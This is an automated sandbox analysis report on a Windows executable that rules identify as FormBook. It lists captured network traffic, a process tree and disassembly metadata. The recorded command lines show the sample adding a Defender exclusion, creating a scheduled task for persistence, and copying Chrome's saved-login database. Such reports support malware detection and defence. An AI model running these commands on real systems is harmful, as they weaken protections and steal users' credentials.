3b 65 2e 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 68 6d 2e 62 61 69 64 75 2e 63 6f 6d 2f 68 6d 2e 6a 73 3f 22 2b 74 3b 76 61 72 20 6f 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 6f 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 65 2c 6f 29 7d 66 75 6e 63 74 69 6f 6e 20 62 61 69 64 75 50 75 73 68 28 74 2c 65 2c 6f 29 7b 77 69 6e 64 6f 77 2e 5f 68 6d 74 2e 70 75 73 68 28 5b 22 5f 74 72 61 63 6b 45 76 65 6e 74 22 2c 74 2c Data Ascii: <!doctype html><html lang="zh"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><script src="https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js" crossorigin="true"></script><script src="https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js" crossorigin="true"></script><script src="https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js" crossorigin="true"></script><script>window.wpkReporter&&(window.wpk=new window.wpkReporter({bid:"berg-download",rel:"2.28.1",sampleRate:1,plugins:[[window.wpkglobalerrorPlugin,{jsErr:!0,jsErrSampleRate:1,resErr:!0,resErrSampleRate:1}],[window.wpkperformancePlugin,{enable:!0,sampleRate:.5}]]}),window.wpk.install())</script><script>function loadBaiduHmt(t){console.log("",t);var e=document.createElement("script");e.src="https://hm.baidu.com/hm.js?"+t;var o=document.getElementsByTagName("script")[0];o.parentNode.insertBefore(e,o)}function baiduPush(t,e,o){window._hmt.push(["_trackEvent",t,
May 14, 2022 15:30:28.838810921 CEST	9277	IN	Data Raw: 65 2c 6f 5d 29 7d 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 22 e5 8a a0 e8 bd bd e7 99 be e5 ba a6 e7 bb 9f e8 ae a1 e8 84 9a e6 9c ac 2e 2e 2e 22 29 2c 77 69 6e 64 6f 77 2e 5f 68 6d 74 3d 77 69 6e 64 6f 77 2e 5f 68 6d 74 7c 7c 5b 5d 3b 63 6f 6e 73 74 Data Ascii: e,o])}console.log("..."),window._hmt=window._hmt\|\|[];const BUILD_ENV="quark",token="42296466acbd6a1e84224ab1433a06cc";loadBaiduHmt(token)</script><script>function send(n){(new Image).src=n}function reportLoading(n){n=n\|
May 14, 2022 15:30:28.838836908 CEST	9278	IN	Data Raw: 6c 61 63 65 28 2f 25 32 30 2f 67 2c 22 2b 22 29 2c 73 3d 22 22 2e 63 6f 6e 63 61 74 28 22 68 74 74 70 73 3a 2f 2f 74 72 61 63 6b 2e 75 63 2e 63 6e 2f 63 6f 6c 6c 65 63 74 22 2c 22 3f 22 29 2e 63 6f 6e 63 61 74 28 63 2c 22 26 22 29 2e 63 6f 6e 63 Data Ascii: lace(/%20/g,"+"),s="".concat("https://track.uc.cn/collect","?").concat(c,"&").concat("uc_param_str=dsfrpfvedncpssntnwbipreimeutsv");(o()\|\|r())&&"android"===function(){var n=window.navigator.userAgent.toLowerCase();return window.ucweb?"android"
May 14, 2022 15:30:28.838855982 CEST	9278	IN	Data Raw: 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 68 65 61 64 22 29 5b 30 5d 2c 24 73 63 72 69 70 74 31 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 24 73 63 72 69 70 74 31 2e 73 65 74 41 74 74 72 Data Ascii: ntsByTagName("head")[0],$script1=document.createElement("script");$script1.setAttribute("cross
May 14, 2022 15:30:28.852871895 CEST	9280	IN	Data Raw: 6f 72 69 67 69 6e 22 2c 22 61 6e 6f 6e 79 6d 6f 75 73 22 29 2c 24 73 63 72 69 70 74 31 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 72 63 22 2c 22 2f 2f 69 6d 61 67 65 2e 75 63 2e 63 6e 2f 73 2f 75 61 65 2f 67 2f 30 31 2f 77 65 6c 66 61 72 65 Data Ascii: origin","anonymous"),$script1.setAttribute("src","//image.uc.cn/s/uae/g/01/welfareagency/vconsole.min-3.3.0.js"),$head.insertBefore($script1,$head.lastChild),$script1.onload=function(){var e=document.createElement("script");e.setAttribute("cro
May 14, 2022 15:30:28.852890015 CEST	9280	IN	Data Raw: 74 70 73 3a 2f 2f 69 6d 61 67 65 2e 75 63 2e 63 6e 2f 73 2f 75 61 65 2f 67 2f 33 6f 2f 62 65 72 67 2f 73 74 61 74 69 63 2f 61 72 63 68 65 72 5f 69 6e 64 65 78 2e 31 63 33 37 38 34 31 37 31 39 32 33 30 39 62 30 61 38 32 37 2e 6a 73 22 3e 3c 2f 73 Data Ascii: tps://image.uc.cn/s/uae/g/3o/berg/static/archer_index.1c378417192309b0a827.js"></script></body></html>

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: iuvRyl9i7D.exePID: 4928, Parent PID: 5260

General

Target ID:	0
Start time:	15:28:36
Start date:	14/05/2022
Path:	C:\Users\user\Desktop\iuvRyl9i7D.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\iuvRyl9i7D.exe"
Imagebase:	0x960000
File size:	731648 bytes
MD5 hash:	F7ECD12D134AAF3541396C78337CE672
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.296276978.0000000002D71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.296852767.0000000002E29000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.298160865.0000000003E93000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.298160865.0000000003E93000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.298160865.0000000003E93000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 6568, Parent PID: 4928

General

Target ID:	3
Start time:	15:28:52
Start date:	14/05/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dDqpEdJEtzi.exe
Imagebase:	0x1210000
File size:	430592 bytes
MD5 hash:	DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 6600, Parent PID: 6568

General

Target ID:	4
Start time:	15:28:54
Start date:	14/05/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff647620000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: schtasks.exePID: 6640, Parent PID: 4928

General

Target ID:	5
Start time:	15:28:54
Start date:	14/05/2022
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dDqpEdJEtzi" /XML "C:\Users\user\AppData\Local\Temp\tmp280F.tmp
Imagebase:	0x230000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 6748, Parent PID: 6640

General

Target ID:	6
Start time:	15:28:55
Start date:	14/05/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff647620000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: iuvRyl9i7D.exePID: 6804, Parent PID: 4928

General

Target ID:	8
Start time:	15:28:58
Start date:	14/05/2022
Path:	C:\Users\user\Desktop\iuvRyl9i7D.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\iuvRyl9i7D.exe
Imagebase:	0x2f0000
File size:	731648 bytes
MD5 hash:	F7ECD12D134AAF3541396C78337CE672
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: iuvRyl9i7D.exePID: 6932, Parent PID: 4928

General

Target ID:	12
Start time:	15:28:59
Start date:	14/05/2022
Path:	C:\Users\user\Desktop\iuvRyl9i7D.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\iuvRyl9i7D.exe
Imagebase:	0x590000
File size:	731648 bytes
MD5 hash:	F7ECD12D134AAF3541396C78337CE672
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.367415725.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.367415725.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.367415725.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000000.293257859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000000.293257859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000000.293257859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.367669336.0000000000BB0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.367669336.0000000000BB0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.367669336.0000000000BB0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000000.292843973.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000000.292843973.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000000.292843973.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.367791319.0000000001000000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.367791319.0000000001000000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.367791319.0000000001000000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: explorer.exePID: 3616, Parent PID: 6932

General

Target ID:	18
Start time:	15:29:04
Start date:	14/05/2022
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff6f3b00000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000000.333082585.000000000B601000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000000.333082585.000000000B601000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000000.333082585.000000000B601000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000000.352301866.000000000B601000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000000.352301866.000000000B601000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000000.352301866.000000000B601000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: control.exePID: 6628, Parent PID: 3616

General

Target ID:	21
Start time:	15:29:33
Start date:	14/05/2022
Path:	C:\Windows\SysWOW64\control.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\control.exe
Imagebase:	0xdf0000
File size:	114688 bytes
MD5 hash:	40FBA3FBFD5E33E0DE1BA45472FDA66F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000015.00000002.508372558.0000000000600000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000015.00000002.508372558.0000000000600000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000015.00000002.508372558.0000000000600000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000015.00000002.509171386.00000000009D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000015.00000002.509171386.00000000009D0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000015.00000002.509171386.00000000009D0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000015.00000002.510342424.0000000000CE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000015.00000002.510342424.0000000000CE0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000015.00000002.510342424.0000000000CE0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 3984, Parent PID: 6628

General

Target ID:	28
Start time:	15:30:07
Start date:	14/05/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
Imagebase:	0x1190000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5132, Parent PID: 3984

General

Target ID:	29
Start time:	15:30:09
Start date:	14/05/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff647620000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: iuvRyl9i7D.exePID: 4928, Parent PID: 5260COMMON

Execution Graph

Execution Coverage:	11%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	119
Total number of Limit Nodes:	5

Executed Functions

Function 07841398 Relevance: 2.2, Strings: 1, Instructions: 983
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

UUUU, xrefs: 0784186A

Memory Dump Source

Source File: 00000000.00000002.302201924.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7840000_iuvRyl9i7D.jbxd

Similarity

API ID:
String ID: UUUU
API String ID: 0-1798160573
Opcode ID: 368617c685439ad9a04bf016ea93fe09e4f022b800f09c5f2d04c4fba0984da7
Instruction ID: c8937daa89b1897f330c4935db1f985d2c2c7f64bf11e8d18b6c034da5130c8f
Opcode Fuzzy Hash: 368617c685439ad9a04bf016ea93fe09e4f022b800f09c5f2d04c4fba0984da7
Instruction Fuzzy Hash: 40A2B275E00228CFDB64CF69C984A99BBB2FF89304F1581E9D509AB325DB319E81CF50

Uniqueness

Uniqueness Score: -1.00%

Function 075D85C0 Relevance: 1.1, Instructions: 1089COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.301804384.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75d0000_iuvRyl9i7D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a442ccc6c2746d634c5a542fa36d3b5fffc226d162938695d50cc67e447cc041
Instruction ID: bcf65d12ac6f2cbecb0d16035b6e1be544ee77ad35d3203df5c02f72c3d613e3
Opcode Fuzzy Hash: a442ccc6c2746d634c5a542fa36d3b5fffc226d162938695d50cc67e447cc041
Instruction Fuzzy Hash: A6A229B5A0020A9FCB24CF68D984AAEBBF2FF89314F158559E4159B3A1D730FD41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 075D7970 Relevance: .9, Instructions: 899COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.301804384.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75d0000_iuvRyl9i7D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7eeaef859892faa37056211d27fef667a253619fa4bbfbe0d35c7a90e64a6f92
Instruction ID: a3a50cde86a528f1267c74a513f706d2a237fd65895d1a650e4aed0582495e32
Opcode Fuzzy Hash: 7eeaef859892faa37056211d27fef667a253619fa4bbfbe0d35c7a90e64a6f92
Instruction Fuzzy Hash: 22725CB1A002199FDB24DF68C844AEEBBF6FF89304F15846AE4059B351DB34ED45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 075D0040 Relevance: .8, Instructions: 840COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.301804384.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75d0000_iuvRyl9i7D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5cff28c5505163c5b78657c13d076b39f0ddc831ea30151ee24d2c84c164bbc
Instruction ID: 60f74c1ab61710e455c3e15a67446b49fed48a0824ff2bf5faec21a8ace9d664
Opcode Fuzzy Hash: f5cff28c5505163c5b78657c13d076b39f0ddc831ea30151ee24d2c84c164bbc
Instruction Fuzzy Hash: EB82BAB1D05269CEEB24CF9AC8583EDFAF5BB89305F1484AAC10DA6191D7794EC9CF10

Uniqueness

Uniqueness Score: -1.00%

Function 075D18D8 Relevance: .7, Instructions: 727COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.301804384.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75d0000_iuvRyl9i7D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 809997f7e4c0bc88a45eae3920648d450c5ab6742b1982c39eed95e13f5d0da0
Instruction ID: 7223d5b495b3abd9a47686c4c9c9499fdca77e775b95edf37d8801ee30043355
Opcode Fuzzy Hash: 809997f7e4c0bc88a45eae3920648d450c5ab6742b1982c39eed95e13f5d0da0
Instruction Fuzzy Hash: C95271B1B0051ACFCB28DF68C984AAD7BB2BF84314F168169E916DB361DB31DD41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 075D4713 Relevance: .6, Instructions: 553COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.301804384.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75d0000_iuvRyl9i7D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56b6eaba573287700184906df9b08fcc80ef76c08e7f5544aa138f99818cc3bb
Instruction ID: 8e5208ca2a19d9ad74fae751ef8e8a655a5f300ce05f9220ee7840a77f34bb73
Opcode Fuzzy Hash: 56b6eaba573287700184906df9b08fcc80ef76c08e7f5544aa138f99818cc3bb
Instruction Fuzzy Hash: 10522774A052188FCB64DF24C999B9DB7B2BF89304F1181E9E509A7395CB349EC1CF91

Uniqueness

Uniqueness Score: -1.00%

Function 075D0006 Relevance: .5, Instructions: 499COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.301804384.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75d0000_iuvRyl9i7D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65e0b9aeab85efe999d05abfb0e7547a18e7a1fb1e9672c2e4ed43ac9b32c8f6
Instruction ID: 59ec3acda51bca532996008592192156e990cd85c59f32a0872b9989753b20ec
Opcode Fuzzy Hash: 65e0b9aeab85efe999d05abfb0e7547a18e7a1fb1e9672c2e4ed43ac9b32c8f6
Instruction Fuzzy Hash: 3532CCB1C05269CFEB24CF96C9583EDBBF5BB85345F0484EAC109AB291D7790A89CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0784B848 Relevance: .2, Instructions: 172COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.302201924.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7840000_iuvRyl9i7D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59cef677f71e193c40f29db16a9d9df9f3230f61682ac5cdb85ebcf7581117c6
Instruction ID: ff416e24840c56cfad1ea5c10e139f7d0025d538d8196fabc2497bab733297e9
Opcode Fuzzy Hash: 59cef677f71e193c40f29db16a9d9df9f3230f61682ac5cdb85ebcf7581117c6
Instruction Fuzzy Hash: ED51E2B0E1521CCFDB14DFAAD8856ADBBF6BB9A304F109029E409F7244EBB49841CF55

Uniqueness

Uniqueness Score: -1.00%

Function 0784A298 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0784A4CE

Memory Dump Source

Source File: 00000000.00000002.302201924.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7840000_iuvRyl9i7D.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: f038b1cdc362823aaf07bb88346fdad4a8060e3545e3416ed1244a95f68a6214
Instruction ID: 3f9b168928a69a5527caf287151b6697940660233d4f147be92ab685f0eb0aeb
Opcode Fuzzy Hash: f038b1cdc362823aaf07bb88346fdad4a8060e3545e3416ed1244a95f68a6214
Instruction Fuzzy Hash: 59916CB1D4421DCFDB24CFA8C9447EDBBB2BB58314F058569D809EB240EB749985CF92

Uniqueness

Uniqueness Score: -1.00%

Function 0134A010 Relevance: 1.7, APIs: 1, Instructions: 194
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0134A256

Memory Dump Source

Source File: 00000000.00000002.295947413.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1340000_iuvRyl9i7D.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 14cea4590173b28e76e6e7d877e0018577fa4c2be45663549bba946eb69549b5
Instruction ID: ecb5f2eb039f13264a37ad4e3f42900a2b79b752c33e230afc84954cf3f9a404
Opcode Fuzzy Hash: 14cea4590173b28e76e6e7d877e0018577fa4c2be45663549bba946eb69549b5
Instruction Fuzzy Hash: A2711370A00B058FDB24DF6AD54575ABBF1BF88308F008A2DD54ADBA50DB35F9498F91

Uniqueness

Uniqueness Score: -1.00%

Function 01344660 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 01345B89

Memory Dump Source

Source File: 00000000.00000002.295947413.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1340000_iuvRyl9i7D.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 687a65ef3b81692b983cd15ff3e48eba67495c5b833340293673843a80d1762e
Instruction ID: 6d0a4396172908ada23939b605c58a3662f1146b7346dd3715d79e792c775047
Opcode Fuzzy Hash: 687a65ef3b81692b983cd15ff3e48eba67495c5b833340293673843a80d1762e
Instruction Fuzzy Hash: CC41F071D0472CCBDB24DFA9C984B8EBBF5BF48308F24816AD409AB251DB756949CF90

Uniqueness

Uniqueness Score: -1.00%

Function 01345ACD Relevance: 1.6, APIs: 1, Instructions: 95
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 01345B89

Memory Dump Source

Source File: 00000000.00000002.295947413.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1340000_iuvRyl9i7D.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 629be139b6bc45333a712569a9b663d9171589e5f0cfa3fe0f55ab4553d471f0
Instruction ID: 6ae6f290f8cda04e795f6e1e37e811812f3b07d9b7c797f58d8ded6c6c6425fc
Opcode Fuzzy Hash: 629be139b6bc45333a712569a9b663d9171589e5f0cfa3fe0f55ab4553d471f0
Instruction Fuzzy Hash: 1241F2B1D1422CCBDB24DFA9C9847CEBBF5BF48308F24816AD409AB251D7756949CF90

Uniqueness

Uniqueness Score: -1.00%

Function 07849F80 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0784A010

Memory Dump Source

Source File: 00000000.00000002.302201924.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7840000_iuvRyl9i7D.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: c0e166a9a81c96ac3741bc59f6df18d4e13636ec1fec3a1ebd1aa3017d0bb78b
Instruction ID: 30061795ae42c168aed7d6508095468461c16eb0c22ec4a6ecbb669cfe9f98be
Opcode Fuzzy Hash: c0e166a9a81c96ac3741bc59f6df18d4e13636ec1fec3a1ebd1aa3017d0bb78b
Instruction Fuzzy Hash: 862157B1904309DFCB10CFA9C9847DEBBF4FF48314F048429E918A7240C778A944CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0134C034 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

